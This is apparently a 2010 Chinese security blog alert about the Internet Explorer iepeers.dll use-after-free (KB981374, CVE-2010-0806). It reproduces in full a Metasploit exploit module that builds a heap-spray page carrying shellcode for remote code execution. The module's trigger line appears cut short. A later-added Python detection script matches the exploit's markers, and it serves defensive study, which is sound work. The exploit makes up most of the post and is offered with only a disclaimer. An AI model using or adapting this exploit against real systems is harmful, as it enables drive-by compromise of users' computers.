Posted: 2010-3-10
KB981374 Orange Alert
A new 0day vulnerability has surfaced in the IE browser. It may allow remote code execution: whoever exploits it can craft a specially prepared page and then, via e-mail, IM messages or other deceptive means, lure the user into visiting that page, which triggers the vulnerability.
I. Timeline:
2010.3.10: Microsoft published security advisory KB981374 and said it would release an out-of-band (additional) patch to fix the vulnerability (normally Microsoft only starts the out-of-band patch process for particularly severe security vulnerabilities).
II. Summary:
This new IE vulnerability lies in the iepeers.dll component and affects IE6/IE7. The vulnerability is already being traded on the underground black market. IE8 is not affected.
III. Impact:
1. Mainly affected users:
XP with IE6/IE7
2. Possibly affected users:
Vista with IE7: Protected Mode reduces the impact
Windows 2003 with IE7: restricted mode reduces the impact
3. Unaffected users:
IE8 users
Windows 2000 with IE5
Code:
# Title: Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta)
# EDB-ID: 11683
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Trancer
# Published: 2010-03-10
# Verified: yes
##
# ie_iepeers_pointer.rb
# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
# Tested successfully on the following platforms:
# - Microsoft Internet Explorer 7, Windows Vista SP2
# - Microsoft Internet Explorer 7, Windows XP SP3
# - Microsoft Internet Explorer 6, Windows XP SP3
# Exploit found in-the-wild. For additional details:
# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
# Trancer
# http://www.rec-sec.com
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Internet Explorer iepeers.dll use-after-free',
      'Description'    => %q{
        This module exploits a use-after-free vulnerability within iepeers.dll of
        Microsoft Internet Explorer versions 6 and 7.
        NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Trancer <mtrancer[at]gmail.com>'
      ],
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2010-0806' ],
          [ 'OSVDB', '62810' ],
          [ 'BID', '38615' ],
          [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
          [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC'             => 'process',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Payload'        =>
        {
          'Space'           => 1024,
          'BadChars'        => "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
        ],
      'DisclosureDate' => 'Mar 09 2010',
      'DefaultTarget'  => 0))
  end
  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Set the return address / nops
    ret = Rex::Text.to_unescape([target.ret].pack('V'))

    # Randomize the javascript variable names
    j_shellcode  = rand_text_alpha(rand(100) + 1)
    j_nops       = rand_text_alpha(rand(100) + 1)
    j_slackspace = rand_text_alpha(rand(100) + 1)
    j_fillblock  = rand_text_alpha(rand(100) + 1)
    j_memory     = rand_text_alpha(rand(100) + 1)
    j_counter    = rand_text_alpha(rand(30) + 2)
    j_ret        = rand_text_alpha(rand(100) + 1)
    j_array      = rand_text_alpha(rand(100) + 1)
    j_function1  = rand_text_alpha(rand(100) + 1)
    j_function2  = rand_text_alpha(rand(100) + 1)
    j_object     = rand_text_alpha(rand(100) + 1)
    j_id         = rand_text_alpha(rand(100) + 1)

    # Build out the message
    html = %Q|<html><body>
<button id='#{j_id}' style='display:none'></button>
<script language='javascript'>
function #{j_function1}(){
var #{j_shellcode} = unescape('#{shellcode}');
#{j_memory} = new Array();
var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
var #{j_nops} = unescape('#{ret}');
while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
delete #{j_nops};
for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
}
}
function #{j_function2}(){
#{j_function1}();
var #{j_object} = document.createElement('body');
#{j_object}.addBehavior('#default#userData');
document.appendChild(#{j_object});
try {
for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
#{j_object}.setAttribute('s',window);
}
} catch(e){ }
window.status+='';
}
document.getElementById('#{j_id}').
</script></body></html>|

    print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

    # Transmit the compressed response to the client
    send_response(cli, html, { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end
end
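A defender-side detection example, added here and not part of the original post or of the Metasploit module above: it pulls the script text out of a page and matches the structural markers of this exploit (the #default#userData behaviour followed by setAttribute(..., window), plus the unescape/string-doubling heap-spray scaffolding), which survive the module's randomized identifier names. The marker set is an assumed heuristic of my own, and both HTML samples are constructed for the test, not captured traffic.

```python
import re
from html.parser import HTMLParser
# Structural markers of the iepeers.dll exploit: the use-after-free trigger
# (userData behaviour, then setAttribute(.., window)) and the heap-spray
# scaffolding (unescape'd %u blocks, string-doubling loop). The module
# randomizes every JavaScript identifier, so match API calls and constants only.
INDICATORS = {
    "userdata_behavior": re.compile(r"addBehavior\s*\(\s*['\"]#default#userData['\"]\s*\)", re.I),
    "setattr_window": re.compile(r"\.setAttribute\s*\(\s*['\"][^'\"]*['\"]\s*,\s*window\s*\)", re.I),
    "unescape_spray": re.compile(r"unescape\s*\(\s*['\"](?:%u[0-9a-f]{4}){2,}", re.I),
    "spray_doubling": re.compile(r"while\s*\([^)]*\.length\s*<[^)]*\)\s*\{\s*(\w+)\s*\+=\s*\1\s*;", re.I),
}

class _ScriptExtractor(HTMLParser):
    """Collect the text of every <script> element, the only code IE executes."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data

def scan_html(html):
    """Return {marker: matched} over the concatenated script text of one page."""
    parser = _ScriptExtractor()
    parser.feed(html)
    parser.close()
    script_text = "\n".join(parser.scripts)
    return {name: bool(rx.search(script_text)) for name, rx in INDICATORS.items()}

def is_iepeers_candidate(html):
    """Alert only on the trigger pair; spray markers alone are too generic."""
    hits = scan_html(html)
    return hits["userdata_behavior"] and hits["setattr_window"]
# Constructed samples, not captured traffic: SUSPECT mirrors the trigger layout
# of the module above (no shellcode); BENIGN uses userData legitimately.
SUSPECT = """<html><body><button id='x' style='display:none'></button><script>
function a(){ var s=unescape('%u0c0c%u0c0c'); while(s.length<0x43000){ s+=s; } }
function b(){ a(); var o=document.createElement('body'); o.addBehavior('#default#userData');
document.appendChild(o); try{ for(i=0;i<10;i++){ o.setAttribute('s',window); } }catch(e){} }
</script></body></html>"""
BENIGN = """<html><body><div id='store'></div><script>var d=document.getElementById('store');
d.addBehavior('#default#userData'); d.setAttribute('theme','dark');</script></body></html>"""
```

Run over proxy-captured or mail-attached HTML, a hit on the trigger pair is a strong signal even when the spray constants have been changed, while the benign sample shows that userData alone must not alert.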
PS: The reason for releasing the code is that the patch has already been published. Please apply it promptly, or else you'll be in trouble!
Friendly reminder: this code is dangerous, use it with caution!
Solemn statement: I provide this bug material for academic exchange only and accept no legal liability whatsoever arising from it. Please take note!